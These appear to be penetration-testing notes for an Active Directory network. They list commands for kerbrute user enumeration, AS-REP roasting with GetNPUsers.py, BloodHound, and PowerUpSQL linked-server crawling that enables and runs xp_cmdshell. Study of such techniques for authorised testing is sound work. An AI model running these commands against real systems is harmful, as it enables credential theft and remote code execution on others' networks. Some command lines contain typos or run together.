After enumerating all the user names its time to identify which users are registered as a part of the network we are testing
This can be done with kerbrute
# add domain name form nmap output to /etc/hosts file
kerbrute userenum -d domainname --dc domainname usernames.txt -o valid_users.txt
Now with the valid users filter out the output and save its output to a new file
cat valid_users.txt | awk '{print $7}' > users
With the user names in hand, we can enumerate which user account is configured with DONOT REQUIRE KERBEROS PREAUTH with GetNPUsers.py from impackets which outputs an TGT ticket to the hacker which can be cracked to obtain the password of that user
Once these doesnt provide any useful information since we have the credentials of the network user we can query the network with bloodhound to obtain information which can help us in the exploitation
# https://github.com/NetSPI/PowerUpSQL
Get-SQLServerLink -Instance server -Verbose
powershell.exe -c "Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql"
# To see servers
select srvname from master..sysservers;
# Native
Get-SQLServerLinkCrawl -Instance server -Query "exec master..xp_cmdshell 'whoami'"
# Linked database tables
select * from openquery("ECORP\FOO", 'select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES')
# You can also use meterpreter module exploit/windows/mssql/mssql_linkcrawler
# With meterpreter module you can find linked databases and if you are admin on them
# You can do a query and try to enable xp_cmpshell on that server
select * from openquery("server",'select * from master..sysservers') EXECUTE AS USER = 'internal_user' ('sp_configure "xp_cmdshell",1;reconfigure;') AT "server"